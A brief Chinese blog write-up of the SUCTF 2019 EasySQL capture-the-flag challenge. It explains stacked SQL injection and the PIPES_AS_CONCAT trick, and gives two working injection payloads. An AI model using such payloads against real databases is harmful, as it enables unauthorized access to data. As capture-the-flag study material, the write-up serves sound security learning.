[SUCTF 2019]EasySQL 1【BUUCFT】【SQL注入】

  • 堆叠注入
  • set sql_mode=PIPES_AS_CONCAT;将||视为字符串的连接操作符而非或运算符
  • 没有过滤*的时候可以直接注入

解法1

*,1

解法2

1;set sql_mode=PIPES_AS_CONCAT;select 1

解析思路参照 The Chen's repository

posted @ 2020-07-20 10:14  Borber  阅读(18)  评论(0编辑  收藏